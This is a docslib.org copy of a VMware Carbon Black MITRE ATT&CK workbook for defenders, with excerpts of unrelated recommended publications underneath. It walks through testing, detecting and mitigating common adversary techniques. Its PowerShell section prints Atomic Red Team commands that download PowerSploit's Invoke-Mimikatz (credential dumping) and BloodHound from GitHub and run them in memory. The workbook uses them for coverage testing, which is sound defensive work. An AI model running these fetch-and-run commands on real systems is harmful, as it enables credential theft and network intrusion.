DOCSLIB.ORG

Mitre Att&Ck Workbook

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Mitre Att&Ck Workbook MITRE ATT&CK WORKBOOK Table of Contents About This Workbook . 4. Getting Started with ATT&CK . 7 Workbook TIDs . .8 . MITRE TID Workbook . 9 T1086 PowerShell . 9 T1064 Scripting . 12 T1117 Regsvr32 . 16 T1090 Connection Proxy . 17. T1193 Spear Phishing Attachment . 20 T1036 Masquerading . .22 T1003 Credential Dumping . 24. T1060 Registry Run Keys / Start Folder . 27 T1085 Rundll32 . 29 T1035 Service Execution . 31 VMware Carbon Black Cloud Overview . 34 2 3 About This Workbook What is MITRE ATT&CK? MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on With the creation of ATT&CK, MITRE is fulfilling its mission to solve problems for a safer world — by bringing real-world observations . The ATT&CK knowledge base is used as a foundation for the development of communities together to develop more effective cybersecurity . ATT&CK is open and available to any person or specific threat models and methodologies in the private sector, in government, and in the cybersecurity organization to use at no charge . https://attack.mitre.org product and service community . INITIAL PRIVILEGE DEFENSE CREDENTIAL LATERAL COMMAND EXECUTION PERSISTENCE DISCOVERY COLLECTION EXFILTRATION IMPACT ACCESS ESCALATION EVASION ACCESS MOVEMENT AND CONTROL Drive-by .bash_profile Access Token Access Token Account Commonly Used Automated AppleScript Account Discovery AppleScript Audio Capture Data Destruction Compromise and .bashrc Manipulation Manipulation Manipulation Port Exfiltration Application Communication Exploit Public- Accessibility Accessibility Application Automated Data Encrypted CMSTP BITS Jobs Bash History Deployment Through Data Compressed Facing Application Features Features Window Discovery Collection for Impact Software Removable Media Distributed External Remote Command-Line Account Browser Bookmark AppCerts DLLs Binary Padding Brute Force Component Clipboard Data Connection Proxy Data Encrypted Defacement Services Interface Manipulation Discovery Object Model Custom Command Hardware Compiled HTML Bypass User Domain Trust Exploitation of Data Transfer AppCert DLLs AppInit DLLs Credential Dumping Data Staged and Control Disk Content Wipe Additions File Account Control Discovery Remote Services Size Limits Protocol Replication Data from Custom Exfiltration Application File and Directory Through Control Panel Items AppInit DLLs CMSTP Credentials in Files Logon Scripts Information Cryptographic Over Alternative Disk Structure Wipe Shimming Discovery Removable Media Repositories Protocol Protocol Exfiltration Over Spear Phishing Dynamic Data Application Bypass User Clear Command Credentials in Network Service Data from Local Endpoint Denial Pass the Hash Data Encoding Command and Attachment Exchange Shimming Account Control History Registry Scanning System of Service Control Channel Exfiltration Over Execution Through Authentication DLL Search Order Exploitation for Network Share Data from Network Firmware Spearphishing Link Code Signing Pass the Ticket Data Obfuscation Other Network API Package Hijcking Credential Access Discovery Shared Drive Corruption Medium Exfiltration Over Spear Phishing via Execution Through Compile After Forced Remote Desktop Data from Inhibit System BITS Jobs Dylib Hijacking Network Sniffing Domain Fronting Other Physical Service Module Load Delivery Authentication Protocol Removable Media Recovery Medium Supply Chain Exploitation for Exploitation for Compiled HTML Password Policy Domain Generation Network Denial Bootkit Hooking Remote File Copy Email Collection Scheduled Transfer Compromise Client Execution Privilege Escalation File Discovery Algorithms of Service 4 5 This workbook is intended to serve as a starting point for mapping to the MITRE ATT&CK to enable the Cyber Defender community to understand adversaries and improve your organization’s security posture . Through Getting Started with ATT&CK this guide you will notice specific reference to the VMware Carbon Black toolset but some capabilities may be available with other endpoint security tools . We would like to credit and thank Red Canary for their excellent work on curating content specifically on This workbook will break down each TID using 3 steps: MITRE ATT&CK . Referenced throughout to make this guide possible: Step 1: Test Technique Red Canary’s Threat Detection Report utilized to pinpoint the top 10 TID’s by prevalence . For each of the TIDs, we will leverage Red Canary’s Atomic Tests to quickly validate coverage. The Atomic Red Team Full Report Here: https://redcanary.com/resources/guides/threat-detection-report was developed by Red Canary to create an open source library of simple tests that every security team can execute to test their environmental controls. Tests are focused, have few dependencies, and are defined in a structured Red Canary’s ATOMIC Tests utilized for quick and easy tests to verify TID coverage . format that can be used by automation frameworks. More on Atomic Red Team here. More on the ATOMIC Red Team here: https://redcanary.com/atomic-red-team Step 2: Validate Coverage, Identify Gaps Be sure to check out their ATOMIC Friday webinars for more breakdowns on ATT&CK stages and testing techniques! Sign up here: https://redcanary.com/blog/atomic-friday-community-discussions ATT&CK was intended to highlight visibility gaps in your organization. Did you alert on the test? Do you have telemetry to build alerts around the specified technique? Re-execute the test once alerts are built. TEST TECHNIQUE Icons Used in This Workbook YES Did you alert on it? NO YES NO BUILD Do you have Telemetry? ACQUIRE DETECTION VISIBILITY Step 3: Identify and Implement Mitigations REMEMBER WARNING TECHNICAL STUFF TIP Can you block it? Some points bear Watch out! This icon indicates technical If you see a Tip icon, While these techniques are commonly utilized by adversaries, they may also be necessary for legitimate day- repeating, and others bear This information tells you information that’s most pay attention — you’re to-day administration . This step will help identify ways to reduce the attack surface through a combination of remembering. When you to steer clear of things that interesting to administrators about to find out how to enhanced visibility and prevention . see this icon, take special may leave you vulnerable, and incident responders. save some aggravation . note of what you’re about cost you big bucks, and time. When implementing prevention on TID’s ensure you can identify potential false to read. suck your time, or be positives that may occur to eliminate organizational friction. MITRE built the ATT&CK bad practices. framework as a detection resource. Prevention does not always match one-to-one. BONUS: Can you interrogate your environment to get more information? 6 7 Workbook TIDs MITRE TID Workbook For this workbook we are providing a starting point for working with the ATT&CK T1086 POWERSHELL Framework. To make the most of your efforts this workbook will detail the top Execution Stage. 10 TID’s as leveraged by adversaries. Why T1086 Matters: PowerShell is included in the Windows operating system and can be leveraged by The 10 TID’s as identified by Red Canary’s 2019 Threat Detection Report. administrators and adversaries alike . Administrator permissions are required to use PowerShell to connect to The full Threat Detection Report is available here. remote systems, and provides full Windows API access. PowerShell can be executed from disk or in memory which makes it easy to evade common defenses . How PowerShell can be leveraged: • Direct execution of a local script • Encoded payloads passed via the command line T1086 T1064 T1117 • Retrieving and executing remote resources using various network protocols POWERSHELL SCRIPTING REGSVR32 • Loading PowerShell into other processes For full description: MITRE Reference Step 1: Test Technique T1090 T1193 T1036 T1003 T1086 Atomic Test – Mimikatz T1086 Atomic Test – BloodHound CONNECTION SPEAR PHISHING MASQUERADING CREDENTIAL Run it with command prompt. Run it with command prompt. PROXY ATTACHMENT DUMPING powershell exe. “IEX (New-Object Net . powershell exe. “IEX (New-Object Net . WebClient) .DownloadString(‘ https://raw . WebClient) .DownloadString(‘ https://raw . githubusercontent com/mattifestation/. githubusercontent com/BloodHoundAD/. T1060 PowerSploit/master/Exfiltration/ BloodHound/master/Ingestors/ T1035 Invoke-Mimikatz .ps1’); Invoke-Mimikatz SharpHound .ps1’); Invoke-BloodHound REGISTRY RUN T1085 SERVICE -DumpCreds” KEYS/START RUNDLL32 EXECUTION FOLDER What’s Gained if Successful? What’s Gained if Successful? Mimikatz is a post-exploitation tool designed to BloodHound is a post-exploitation tool designed dump passwords, hashes, PINs and Kerberos tickets to map out AD structures to identify gaps in logic from memory . If an adversary is successful they will that will allow for privilege escalation . If successful Run these tests monthly to maintain an understanding of your gaps and risks. have access to credentials to elevate privileges and/ the adversary will have a list of admin users, global Don’t wait for an adversary to find the weaknesses in your defenses. or move laterally through the network . access users, and group membership information. For more Atomic tests: Atomic Tests 8 9 Step 2: Validate Coverage, Identify Gaps Can you block it? Yes, but it is likely that there are several applications and users within your organization that will need access to Did you alert on this test? PowerShell in order to function. In your endpoint security
Load more

Recommended publications
  • Attacker Antics Illustrations of Ingenuity
    ATTACKER ANTICS ILLUSTRATIONS OF INGENUITY Bart Inglot and Vincent Wong FIRST CONFERENCE 2018 2 Bart Inglot ◆ Principal Consultant at Mandiant ◆ Incident Responder ◆ Rock Climber ◆ Globetrotter ▶ From Poland but live in Singapore ▶ Spent 1 year in Brazil and 8 years in the UK ▶ Learning French… poor effort! ◆ Twitter: @bartinglot ©2018 FireEye | Private & Confidential 3 Vincent Wong ◆ Principal Consultant at Mandiant ◆ Incident Responder ◆ Baby Sitter ◆ 3 years in Singapore ◆ Grew up in Australia ©2018 FireEye | Private & Confidential 4 Disclosure Statement “ Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers. ” ©2018 FireEye | Private & Confidential 5 Today’s Tales 1. AV Server Gone Bad 2. Stealing Secrets From An Air-Gapped Network 3. A Backdoor That Uses DNS for C2 4. Hidden Comment That Can Haunt You 5. A Little Known Persistence Technique 6. Securing Corporate Email is Tricky 7. Hiding in Plain Sight 8. Rewriting Import Table 9. Dastardly Diabolical Evil (aka DDE) ©2018 FireEye | Private & Confidential 6 AV SERVER GONE BAD Cobalt Strike, PowerShell & McAfee ePO (1/9) 7 AV Server Gone Bad – Background ◆ Attackers used Cobalt Strike (along with other malware) ◆ Easily recognisable IOCs when recorded by Windows Event Logs ▶ Random service name – also seen with Metasploit ▶ Base64-encoded script, “%COMSPEC%” and “powershell.exe” ▶ Decoding the script yields additional PowerShell script with a base64-encoded GZIP stream that in turn contained a base64-encoded Cobalt Strike “Beacon” payload.
    [Show full text]
  • Powershell Integration with Vmware View 5.0
    PowerShell Integration with VMware® View™ 5.0 TECHNICAL WHITE PAPER PowerShell Integration with VMware View 5.0 Table of Contents Introduction . 3 VMware View. 3 Windows PowerShell . 3 Architecture . 4 Cmdlet dll. 4 Communication with Broker . 4 VMware View PowerCLI Integration . 5 VMware View PowerCLI Prerequisites . 5 Using VMware View PowerCLI . 5 VMware View PowerCLI cmdlets . 6 vSphere PowerCLI Integration . 7 Examples of VMware View PowerCLI and VMware vSphere PowerCLI Integration . 7 Passing VMs from Get-VM to VMware View PowerCLI cmdlets . 7 Registering a vCenter Server . .. 7 Using Other VMware vSphere Objects . 7 Advanced Usage . 7 Integrating VMware View PowerCLI into Your Own Scripts . 8 Scheduling PowerShell Scripts . 8 Workflow with VMware View PowerCLI and VMware vSphere PowerCLI . 9 Sample Scripts . 10 Add or Remove Datastores in Automatic Pools . 10 Add or Remove Virtual Machines . 11 Inventory Path Manipulation . 15 Poll Pool Usage . 16 Basic Troubleshooting . 18 About the Authors . 18 TECHNICAL WHITE PAPER / 2 PowerShell Integration with VMware View 5.0 Introduction VMware View VMware® View™ is a best-in-class enterprise desktop virtualization platform. VMware View separates the personal desktop environment from the physical system by moving desktops to a datacenter, where users can access them using a client-server computing model. VMware View delivers a rich set of features required for any enterprise deployment by providing a robust platform for hosting virtual desktops from VMware vSphere™. Windows PowerShell Windows PowerShell is Microsoft’s command line shell and scripting language. PowerShell is built on the Microsoft .NET Framework and helps in system administration. By providing full access to COM (Component Object Model) and WMI (Windows Management Instrumentation), PowerShell enables administrators to perform administrative tasks on both local and remote Windows systems.
    [Show full text]
  • Run-Commands-Windows-10.Pdf
    Run Commands Windows 10 by Bettertechtips.com Command Action Command Action documents Open Documents Folder devicepairingwizard Device Pairing Wizard videos Open Videos Folder msdt Diagnostics Troubleshooting Wizard downloads Open Downloads Folder tabcal Digitizer Calibration Tool favorites Open Favorites Folder dxdiag DirectX Diagnostic Tool recent Open Recent Folder cleanmgr Disk Cleanup pictures Open Pictures Folder dfrgui Optimie Drive devicepairingwizard Add a new Device diskmgmt.msc Disk Management winver About Windows dialog dpiscaling Display Setting hdwwiz Add Hardware Wizard dccw Display Color Calibration netplwiz User Accounts verifier Driver Verifier Manager azman.msc Authorization Manager utilman Ease of Access Center sdclt Backup and Restore rekeywiz Encryption File System Wizard fsquirt fsquirt eventvwr.msc Event Viewer calc Calculator fxscover Fax Cover Page Editor certmgr.msc Certificates sigverif File Signature Verification systempropertiesperformance Performance Options joy.cpl Game Controllers printui Printer User Interface iexpress IExpress Wizard charmap Character Map iexplore Internet Explorer cttune ClearType text Tuner inetcpl.cpl Internet Properties colorcpl Color Management iscsicpl iSCSI Initiator Configuration Tool cmd Command Prompt lpksetup Language Pack Installer comexp.msc Component Services gpedit.msc Local Group Policy Editor compmgmt.msc Computer Management secpol.msc Local Security Policy: displayswitch Connect to a Projector lusrmgr.msc Local Users and Groups control Control Panel magnify Magnifier
    [Show full text]
  • Powerview Command Reference
    PowerView Command Reference TRACE32 Online Help TRACE32 Directory TRACE32 Index TRACE32 Documents ...................................................................................................................... PowerView User Interface ............................................................................................................ PowerView Command Reference .............................................................................................1 History ...................................................................................................................................... 12 ABORT ...................................................................................................................................... 13 ABORT Abort driver program 13 AREA ........................................................................................................................................ 14 AREA Message windows 14 AREA.CLEAR Clear area 15 AREA.CLOSE Close output file 15 AREA.Create Create or modify message area 16 AREA.Delete Delete message area 17 AREA.List Display a detailed list off all message areas 18 AREA.OPEN Open output file 20 AREA.PIPE Redirect area to stdout 21 AREA.RESet Reset areas 21 AREA.SAVE Save AREA window contents to file 21 AREA.Select Select area 22 AREA.STDERR Redirect area to stderr 23 AREA.STDOUT Redirect area to stdout 23 AREA.view Display message area in AREA window 24 AutoSTOre ..............................................................................................................................
    [Show full text]
  • Blue Coat SGOS Command Line Interface Reference, Version 4.2.3
    Blue Coat® Systems ProxySG™ Command Line Interface Reference Version SGOS 4.2.3 Blue Coat ProxySG Command Line Interface Reference Contact Information Blue Coat Systems Inc. 420 North Mary Ave Sunnyvale, CA 94085-4121 http://www.bluecoat.com/support/contact.html [email protected] http://www.bluecoat.com For concerns or feedback about the documentation: [email protected] Copyright© 1999-2006 Blue Coat Systems, Inc. All rights reserved worldwide. No part of this document may be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the written consent of Blue Coat Systems, Inc. All right, title and interest in and to the Software and documentation are and shall remain the exclusive property of Blue Coat Systems, Inc. and its licensors. ProxySG™, ProxyAV™, CacheOS™, SGOS™, Spyware Interceptor™, Scope™, RA Connector™, RA Manager™, Remote Access™ are trademarks of Blue Coat Systems, Inc. and CacheFlow®, Blue Coat®, Accelerating The Internet®, WinProxy®, AccessNow®, Ositis®, Powering Internet Management®, The Ultimate Internet Sharing Solution®, Permeo®, Permeo Technologies, Inc.®, and the Permeo logo are registered trademarks of Blue Coat Systems, Inc. All other trademarks contained in this document and in the Software are the property of their respective owners. BLUE COAT SYSTEMS, INC. DISCLAIMS ALL WARRANTIES, CONDITIONS OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON SOFTWARE AND DOCUMENTATION FURNISHED HEREUNDER INCLUDING WITHOUT LIMITATION THE WARRANTIES OF DESIGN, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL BLUE COAT SYSTEMS, INC., ITS SUPPLIERS OR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY EVEN IF BLUE COAT SYSTEMS, INC.
    [Show full text]
  • View the Slides (Smith)
    Network Shells Michael Smith Image: https://commons.wikimedia.org/wiki/File:Network-connections.png What does a Shell give us? ● A REPL ● Repeatability ● Direct access to system operations ● User-focused design ● Hierarchical context & sense of place Image: https://upload.wikimedia.org/wikipedia/commons/8/84/Bash_demo.png What does a Shell give us? ● A REPL ● Repeatability ● Direct access to system operations ● User-focused design ● Hierarchical context & sense of place Image: https://upload.wikimedia.org/wikipedia/commons/8/84/Bash_demo.png Management at a distance (netsh) Netsh: Configure DHCP servers with netsh -r RemoteMachine -u domain\username [RemoteMachine] netsh>interface [RemoteMachine] netsh interface>ipv6 [RemoteMachine] netsh interface ipv6>show interfaces Reference: https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts Management at a distance (netsh) Netsh: Configure DHCP servers with netsh Location-r RemoteMachine -u domain\username Hierarchical [RemoteMachine] netsh>interfacecontext Simpler [RemoteMachine] netsh interface>ipv6 commands [RemoteMachine] netsh interface ipv6>show interfaces Reference: https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts Management at a distance (WSMan) WSMan (in Powershell): Manage Windows remotely with Set-Location -Path WSMan:\SERVER01 Get-ChildItem -Path . Set-Item Client\TrustedHosts *.domain2.com -Concatenate Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/about/about_wsman_provider
    [Show full text]
  • Your Guide to Installing and Using Coastal Explorer EXPLORING COASTAL EXPLORER Version 4
    EXPLORING COASTAL EXPLORER Your guide to installing and using Coastal Explorer EXPLORING COASTAL EXPLORER Version 4 Your guide to installing and using Coastal Explorer Copyright © 2017 Rose Point Navigation Systems. All rights reserved. Rose Point Navigation Systems, Coastal Explorer, and Coastal Explorer Network are trademarks of Rose Point Navigation Systems. The names of any other companies and/or products mentioned herein may be the trademarks of their respective owners. WARNINGS: Use Coastal Explorer at your own risk. Be sure to carefully read and understand the user's manual and practice operation prior to actual use. Coastal Explorer depends on information from the Global Position System (GPS) and digital charts, both of which may contain errors. Navigators should be aware that GPS- derived positions are often of higher accuracy than the positions of charted data. Rose Point Navigation Systems does not warrant the accuracy of any information presented by Coastal Explorer. Coastal Explorer is intended to be used as a supplementary aid to navigation and must not be considered a replacement for official government charts, notices to mariners, tide and current tables, and/or other reference materials. The captain of a vessel is ultimately responsible for its safe navigation and the prudent mariner does not rely on any single source of information. The information in this manual is subject to change without notice. Rose Point Navigation Systems 18005 NE 68th Street Suite A100 Redmond, WA 98052 Phone: 425-605-0985 Fax: 425-605-1285 e-mail: [email protected] www.rosepoint.com Welcome to Coastal Explorer Thank you for choosing Coastal Explorer! If you are new to navigation software, but use a computer for anything else, you will find that Coastal Explorer works just like many other Windows applications: you create documents, edit them, save them, print them, etc.
    [Show full text]
  • Invalid Class String Error
    Tib4231 July, 2001 TECHNICAL INFORMATION BULLETIN Invalid Class String Error KODAK DC215, KODAK DC240, KODAK DC280, DC3400, and DC5000 Zoom Digital Cameras An Invalid Class String error may occur when you try to launch the camera software for the first time, or the Mounter or Camera Properties software may not operate properly.This error is caused when the program RegSvr32.exe is not located in the C:\Windows\System folder, preventing the DLL files from being registered. Use this document to help you properly locate the RegSvr32.exe program in your system, and if necessary, manually register the DLL files. The instructions in this document assume that you are familiar with copying and moving files in your computer, and installing software. Relocating RegSvr32.exe 1. Go to Start > Find > Files and Folders and search for regsvr32*.* Note the location of the program. 2. In WINDOWS Explorer or My Computer, copy RegSvr32.exe to the C:\Windows\System folder if it is not already there. When the file is in place, go on to Step 3. 3. Uninstall the KODAK software using the KODAK Uninstall application, or go to Start > Settings > Control Panel > Add / Remove Programs. 4. Close all background programs except Explorer and Systray by pressing Ctrl Alt Del, selecting each program one at a time, and clicking End Task after each. 5. Install the KODAK camera software. 6. Start the KODAK Camera Mounter and Camera Properties software for your camera. If the Invalid Class String error appears, manually register the DLL file using the procedure that follows for your camera.
    [Show full text]
  • VNC User Guide 7 About This Guide
    VNC® User Guide Version 5.3 December 2015 Trademarks RealVNC, VNC and RFB are trademarks of RealVNC Limited and are protected by trademark registrations and/or pending trademark applications in the European Union, United States of America and other jursidictions. Other trademarks are the property of their respective owners. Protected by UK patent 2481870; US patent 8760366 Copyright Copyright © RealVNC Limited, 2002-2015. All rights reserved. No part of this documentation may be reproduced in any form or by any means or be used to make any derivative work (including translation, transformation or adaptation) without explicit written consent of RealVNC. Confidentiality All information contained in this document is provided in commercial confidence for the sole purpose of use by an authorized user in conjunction with RealVNC products. The pages of this document shall not be copied, published, or disclosed wholly or in part to any party without RealVNC’s prior permission in writing, and shall be held in safe custody. These obligations shall not apply to information which is published or becomes known legitimately from some source other than RealVNC. Contact RealVNC Limited Betjeman House 104 Hills Road Cambridge CB2 1LQ United Kingdom www.realvnc.com Contents About This Guide 7 Chapter 1: Introduction 9 Principles of VNC remote control 10 Getting two computers ready to use 11 Connectivity and feature matrix 13 What to read next 17 Chapter 2: Getting Connected 19 Step 1: Ensure VNC Server is running on the host computer 20 Step 2: Start VNC
    [Show full text]
  • Automated Malware Analysis Report for Oldnewexplorercfg.Exe
    ID: 152305 Sample Name: OldNewExplorerCfg.exe Cookbook: default.jbs Time: 03:48:12 Date: 15/07/2019 Version: 26.0.0 Aquamarine Table of Contents Table of Contents 2 Analysis Report OldNewExplorerCfg.exe 5 Overview 5 General Information 5 Detection 5 Confidence 6 Classification 6 Analysis Advice 6 Mitre Att&ck Matrix 7 Signature Overview 7 AV Detection: 7 Spreading: 7 Networking: 7 Key, Mouse, Clipboard, Microphone and Screen Capturing: 7 DDoS: 8 System Summary: 8 Data Obfuscation: 8 Hooking and other Techniques for Hiding and Protection: 8 Malware Analysis System Evasion: 8 Anti Debugging: 8 HIPS / PFW / Operating System Protection Evasion: 8 Language, Device and Operating System Detection: 8 Behavior Graph 9 Simulations 9 Behavior and APIs 9 Antivirus and Machine Learning Detection 9 Initial Sample 9 Dropped Files 9 Unpacked PE Files 9 Domains 10 URLs 10 Yara Overview 10 Initial Sample 10 PCAP (Network Traffic) 10 Dropped Files 10 Memory Dumps 10 Unpacked PEs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 10 JA3 Fingerprints 10 Dropped Files 10 Screenshots 10 Thumbnails 11 Startup 11 Created / dropped Files 12 Domains and IPs 12 Contacted Domains 12 URLs from Memory and Binaries 12 Contacted IPs 12 Static File Info 12 General 12 File Icon 13 Static PE Info 13 General 13 Entrypoint Preview 13 Data Directories 14 Sections 14 Copyright Joe Security LLC 2019 Page 2 of 27 Resources 14 Imports 15 Version Infos 16 Possible Origin 16 Network Behavior 17 Code Manipulations 17 Statistics 17 Behavior 17 System Behavior 17 Analysis Process:
    [Show full text]
  • Copyrighted Material
    Index Numerics Address Resolution Protocol (ARP), 1052–1053 admin password, SOHO network, 16-bit Windows applications, 771–776, 985, 1011–1012 900, 902 Administrative Tools window, 1081–1083, 32-bit (x86) architecture, 124, 562, 769 1175–1176 64-bit (x64) architecture, 124, 562, 770–771 administrative tools, Windows, 610 administrator account, 1169–1170 A Administrators group, 1171 ADSL (Asynchronous Digital Subscriber Absolute Software LoJack feature, 206 Line), 1120 AC (alternating current), 40 Advanced Attributes window, NTFS AC adapters, 311–312, 461, 468–469 partitions, 692 Accelerated Graphics Port (AGP), 58 Advanced Computing Environment (ACE) accelerated video cards (graphics initiative, 724 accelerator cards), 388 Advanced Confi guration and Power access points, wireless, 996, 1121 Interface (ACPI) standard, 465 access time, hard drive, 226 Advanced Graphics Port (AGP) card, access tokens, 1146–1147 391–392 Account Operators group, 1172 Advanced Graphics Port (AGP) port, 105 ACE (Advanced Computing Environment) Advanced Host Controller Interface (AHCI), initiative, 724 212–213 ACPI (Advanced Confi guration and Power Advanced Micro Devices (AMD), 141–144 Interface) standard, 465 Advanced Packaging Tool (APT), 572 Action Center, 1191–1192 Advanced Power Management (APM) Active Directory Database, 1145–1146, 1183 standard, 465 active heat sink, 150 Advanced Programmable Interrupt active matrix display, LCD (thin-fi lm Controller (APIC), 374 transistor (TFT) display), 470 Advanced RISC Computing Specifi cation active partition, 267,
    [Show full text]
  • Implementation of Clipboard Security Using Cryptographic Techniques
    International Journal of Computer Applications (0975 – 8887) Volume 86 – No 6, January 2014 Implementation of Clipboard Security using Cryptographic Techniques Gaurav Pathak Gaurav Kumar Tak Department of Computer Department of Computer Science and Engineering Science and Engineering Lovely Professional University Lovely Professional University Phagwara, India Phagwara, India ABSTRACT looking malicious content. So security to clipboard content is In the present scenario malicious authors are rapidly growing issue of concern and need to enhance the functionality of and now other than internet users they are also targeting the operating system by which we can protect our clipboard data loophole in operating system application level security. from being got watched. Transferring data between applications is common user From the study of recent papers and market reports, clipboard activity. Since data in a clipboard is freely delivered between security becomes important issue of concern in data security. arbitrary programs capable of using a format of the data, a According to the google forum [6] there is being the great simple text, a rich text, a picture, and information having a threat to the clipboard security in which they talk about particular format may be delivered between programs capable ClipNote that can monitor the system clipboard of using such information. Information delivery made and collect all clipboard entries. That ClipNote application between programs through a clipboard is undoubtedly an does not require any special permission to run. That means efficient method of properly using a multitasking function of any malware can steal passwords by just monitoring the an operating system, but as the security of important data is system clipboard in the background, which become great increasingly demanded, data transmitted between independent threat to the client’s system.
    [Show full text]